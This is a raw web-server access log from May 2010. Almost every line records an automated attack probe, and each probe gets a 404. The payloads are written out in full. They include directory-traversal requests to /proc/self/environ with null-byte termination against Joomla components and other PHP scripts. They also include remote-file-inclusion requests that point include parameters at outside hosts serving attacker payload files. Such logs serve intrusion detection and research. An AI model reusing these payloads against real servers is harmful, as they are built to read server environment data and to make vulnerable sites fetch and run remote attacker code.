174.121.59.218 - - [25/May/2010:00:06:59 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:00:07:08 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:00:07:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [25/May/2010:00:07:28 -0500] "GET /logs/access_log.1228780800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.210.123.70 - - [25/May/2010:00:08:38 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
67.210.123.70 - - [25/May/2010:00:08:38 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
67.227.143.132 - - [25/May/2010:00:09:40 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:00:09:40 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.175.61.122 - - [25/May/2010:00:09:42 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
69.175.61.122 - - [25/May/2010:00:09:43 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
88.191.94.188 - - [25/May/2010:00:14:45 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:14:45 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:14:46 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:14:46 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:14:46 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:14:46 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.61.122 - - [25/May/2010:00:15:03 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
88.191.94.188 - - [25/May/2010:00:15:10 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:15:10 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:15:10 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:15:12 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:15:12 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:15:12 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
91.211.113.71 - - [25/May/2010:00:15:23 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
74.54.63.138 - - [25/May/2010:00:15:45 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.210.123.70 - - [25/May/2010:00:16:07 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
174.121.59.218 - - [25/May/2010:00:16:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
89.108.70.32 - - [25/May/2010:00:16:37 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.227.143.132 - - [25/May/2010:00:17:01 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
195.159.29.178 - - [25/May/2010:00:17:03 -0500] "GET /logs//webmail.technelogics.com:32000//accounts/inc/include.php?language=0&lang_settings[0][1]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:17:03 -0500] "GET //webmail.technelogics.com:32000//accounts/inc/include.php?language=0&lang_settings[0][1]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:17:03 -0500] "GET /logs/access_log.1262822400//webmail.technelogics.com:32000//accounts/inc/include.php?language=0&lang_settings[0][1]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:17:17 -0500] "GET /logs/access_log.1264204800//webmail.technelogics.com:32000//accounts/inc/include.php?language=0&lang_settings[0][1]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:18:38 -0500] "GET /logs/access_log.1232668800%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:00:18:43 -0500] "GET /logs/access_log.1232668800%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
112.216.153.186 - - [25/May/2010:00:24:49 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
112.216.153.186 - - [25/May/2010:00:24:49 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
112.216.153.186 - - [25/May/2010:00:24:49 -0500] "GET /logs/access_log.1205107200%20%20//oneadmin/photogallery/include.php?path[docroot]=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:32 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:32 -0500] "GET /logs/access_log.1205107200%20%20//oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:32 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:32 -0500] "GET /logs/access_log.1205107200%20%20//oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:34 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:35 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:35 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:35 -0500] "GET /logs/access_log.1205107200%20%20//oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:36 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:47 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:50 -0500] "GET /logs/access_log.1205107200%20%20//oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:26:50 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [25/May/2010:00:26:53 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [25/May/2010:00:27:01 -0500] "GET /logs///appserv/main.php/?appserv_root=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:00:27:04 -0500] "GET /logs/access_log.1271548800///appserv/main.php/?appserv_root=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:00:27:04 -0500] "GET ///appserv/main.php/?appserv_root=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:00:27:30 -0500] "GET /logs/access_log.1271548800///appserv/main.php/?appserv_root=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:00:27:30 -0500] "GET ///appserv/main.php/?appserv_root=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:00:27:30 -0500] "GET /logs///appserv/main.php/?appserv_root=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:29:15 -0500] "GET /logs/access_log.1266537600///webmail.technelogics.com:32000//accounts/inc/include.php?language=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:29:15 -0500] "GET ///webmail.technelogics.com:32000//accounts/inc/include.php?language=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:29:15 -0500] "GET /logs///webmail.technelogics.com:32000//accounts/inc/include.php?language=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:00:29:20 -0500] "GET //phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.79"
195.159.29.178 - - [25/May/2010:00:30:02 -0500] "GET /logs/access_log.1270512000///webmail.technelogics.com:32000//accounts/inc/include.php?language=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:31:28 -0500] "GET ///webmail.technelogics.com:32000//accounts/inc/include.php?language=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:31:28 -0500] "GET /logs/access_log.1270512000///webmail.technelogics.com:32000//accounts/inc/include.php?language=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:00:31:28 -0500] "GET /logs///webmail.technelogics.com:32000//accounts/inc/include.php?language=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [25/May/2010:00:31:56 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [25/May/2010:00:31:56 -0500] "GET /logs/access_log.1270771200//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.190.102.21 - - [25/May/2010:00:31:57 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [25/May/2010:00:32:04 -0500] "GET /logs/access_log.1271721600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.190.102.21 - - [25/May/2010:00:33:15 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [25/May/2010:00:33:15 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [25/May/2010:00:33:15 -0500] "GET /logs/access_log.1270771200//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.190.102.21 - - [25/May/2010:00:33:15 -0500] "GET /logs/access_log.1271721600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
87.250.255.243 - - [25/May/2010:00:39:59 -0500] "GET /logs/access_log.1217808000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.236.37.218 - - [25/May/2010:00:42:05 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.236.37.218 - - [25/May/2010:00:42:05 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.211.113.71 - - [25/May/2010:00:43:54 -0500] "GET /logs/index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.211.113.71 - - [25/May/2010:00:43:55 -0500] "GET /index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
74.54.63.138 - - [25/May/2010:00:43:58 -0500] "GET /logs/access_log.1274313600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [25/May/2010:00:43:58 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [25/May/2010:00:43:59 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
69.175.61.122 - - [25/May/2010:00:43:59 -0500] "GET /logs/access_log.1274313600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
69.175.61.122 - - [25/May/2010:00:43:59 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
69.175.61.122 - - [25/May/2010:00:43:59 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
74.54.63.138 - - [25/May/2010:00:44:03 -0500] "GET /logs/index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.54.63.138 - - [25/May/2010:00:44:03 -0500] "GET /index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.175.61.122 - - [25/May/2010:00:44:03 -0500] "GET /logs/index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
69.175.61.122 - - [25/May/2010:00:44:03 -0500] "GET /index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
67.210.123.70 - - [25/May/2010:00:44:06 -0500] "GET /logs/index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.819"
67.210.123.70 - - [25/May/2010:00:44:06 -0500] "GET /index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.819"
174.121.59.218 - - [25/May/2010:00:44:21 -0500] "GET /logs/index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.121.59.218 - - [25/May/2010:00:44:22 -0500] "GET /index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:00:44:44 -0500] "GET /logs/index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:00:44:44 -0500] "GET /index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.210.123.70 - - [25/May/2010:00:45:30 -0500] "GET /logs/access_log.1274313600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.819"
67.210.123.70 - - [25/May/2010:00:45:30 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
67.210.123.70 - - [25/May/2010:00:45:31 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
121.88.4.141 - - [25/May/2010:00:46:17 -0500] "GET /logs/access_log.1273104000//phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.79"
121.88.4.141 - - [25/May/2010:00:46:18 -0500] "GET //phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.79"
121.88.4.141 - - [25/May/2010:00:46:18 -0500] "GET /logs//phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.79"
89.108.70.32 - - [25/May/2010:00:46:31 -0500] "GET /logs/access_log.1274313600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.70.32 - - [25/May/2010:00:46:32 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [25/May/2010:00:46:32 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
58.230.162.220 - - [25/May/2010:00:48:41 -0500] "GET /logs/access_log.1271548800///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:48:41 -0500] "GET /logs///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:48:41 -0500] "GET ///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:48:44 -0500] "GET /logs///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:48:44 -0500] "GET /logs/access_log.1271548800///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:48:44 -0500] "GET ///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:48:49 -0500] "GET ///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:48:49 -0500] "GET /logs///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:48:49 -0500] "GET /logs/access_log.1271548800///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.121.59.218 - - [25/May/2010:00:48:49 -0500] "GET /logs/access_log.1274313600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
